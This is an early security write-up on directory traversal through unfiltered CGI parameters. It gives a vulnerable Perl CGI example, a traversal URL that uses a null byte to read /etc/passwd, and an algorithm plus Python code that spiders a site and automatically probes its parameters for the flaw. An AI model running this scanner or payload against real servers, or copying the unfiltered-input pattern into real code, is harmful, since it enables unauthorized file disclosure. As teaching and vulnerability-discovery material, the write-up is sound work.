CC V

by Samy Kamkar [CommPort5@LucidX.com]

Bug Classification
Improper filtering of CGI parameters

Example and Description
Many CGIs, or Common Gateway Interfaces, are used to retrieve files on the machine running the HTTP daemon and output their data to the user remotely accessing the CGI. The problem with many of these CGIs is that the developers do not filter the user input, even though it is the user who submits all or part of the name of the file that is accessed. This allows malicious users to read files that they shouldn't have access to, or even execute programs on the machine.

Here is some example Perl code of a basic CGI with the common bug of applying no filtering to important user input:

---------------------------------------
#!/usr/bin/perl
use CGI qw/:standard/;                    # standard CGI module
print header;                             # Content-Type header
$dir = "htmlfiles";                       # directory where the HTML files would be
$file = param("file");                    # input from the user, unfiltered
$fullpath = $dir . "/" . $file . ".html"; # create a full path
open(FILE, "<$fullpath") or die;          # open the file, read-only mode
while (<FILE>) { print }                  # print the contents of the file
close(FILE);                              # close the file
# end of code
---------------------------------------

The problem with this code is that a malicious user is able to read data that s/he shouldn't have access to. A good example is /etc/passwd, since it's almost always readable by any user and is present on almost all UNIX-like systems.

Two things are required to read a file such as /etc/passwd, both of which should be, but aren't, filtered by this program. One is to escape the directory that the open() statement would normally read from, and the second is to escape the ".html" appended to the path before the open(). Here is an example of a URL to read /etc/passwd on a machine running the example CGI:

http://server/cgi-bin/the.cgi?file=../../../../../../../../etc/passwd%00

The CGI then reads "htmlfiles/../../../../../../../../etc/passwd\0.html". %00 decodes to \0, the null terminator, and the null terminator is what escapes the ".html": open() and many other functions in many languages stop reading inputted data once they reach a null terminator. And to escape the directory that open() reads from, we use ../'s.
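To see concretely how the ../'s escape the htmlfiles directory, here is a small sketch (in Python rather than the article's Perl) that normalizes the path the CGI ends up opening, after the null byte has truncated the ".html":

```python
import posixpath

# Path the vulnerable CGI builds, once the %00 null byte has truncated
# the trailing ".html" (eight "../"s, as in the example URL above)
fullpath = "htmlfiles/" + "../" * 8 + "etc/passwd"

# Each ".." cancels one directory: the first cancels "htmlfiles", and the
# remaining seven climb toward the filesystem root
print(posixpath.normpath(fullpath))  # -> ../../../../../../../etc/passwd
```

Any extra ../'s beyond the actual directory depth are harmless, which is why attackers simply stack plenty of them.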

- Algorithm
1. Spider the website, starting from the root index.
2. Recursively search through all URLs on the web site to find all URLs that are on that machine.
3. Find all URLs in the already-found URLs that contain a '?' and assume that those are the only URLs that are vulnerable to our bug.
4. Find all key and element pairs in each of these URLs and find all URLs with only a key (no '=' in the URL) and consider that key an element.
5. Go through each key and element of each URL and replace each element with '../' x 20 . 'etc/passwd%00' (that is, twenty '../'s followed by 'etc/passwd%00').
6. For every element replacement, do a GET request on that URL and match the response against /root:/.
7. For each response that contains 'root:', repeatedly remove one '../' from the URL, do a GET request on the new URL, and check whether the response still contains 'root:'. Once it no longer does, add one '../' back and log that URL as an exploitable CGI. Then continue element replacement to find any other bugs in the remaining key and element pairs.
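Steps 4 through 7 above can be sketched roughly as follows (in Python rather than the article's Perl). This assumes steps 1-3 have already produced the list of URLs containing a '?'; the example URL in the usage note is hypothetical:

```python
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode
from urllib.request import urlopen

PAYLOAD = "../" * 20 + "etc/passwd%00"  # step 5: twenty "../"s plus the null byte

def candidate_urls(url, payload=PAYLOAD):
    """Step 5: yield one URL per key, with that key's element replaced by the payload."""
    scheme, host, path, query, frag = urlsplit(url)
    # keep_blank_values=True also keeps keys that have no '=' (step 4)
    pairs = parse_qsl(query, keep_blank_values=True)
    for i in range(len(pairs)):
        mutated = list(pairs)
        mutated[i] = (pairs[i][0], payload)
        # identity quote_via leaves the "../"s and the pre-encoded %00 intact
        new_query = urlencode(mutated, quote_via=lambda s, *a: s)
        yield urlunsplit((scheme, host, path, new_query, frag))

def looks_exploitable(url):
    """Step 6: GET the URL and look for 'root:' (the start of an /etc/passwd entry)."""
    try:
        body = urlopen(url, timeout=10).read().decode("latin-1")
    except OSError:
        return False
    return "root:" in body

def minimal_depth(url):
    """Step 7: strip '../'s one at a time while 'root:' persists; the last
    URL that still worked is the one to log as an exploitable CGI."""
    while looks_exploitable(url.replace("../", "", 1)):
        url = url.replace("../", "", 1)
    return url
```

For example, candidate_urls("http://server/cgi-bin/the.cgi?file=index&lang=en") yields two URLs, one with each element replaced by the payload in turn; any of them for which looks_exploitable() returns true would then be passed through minimal_depth() and logged.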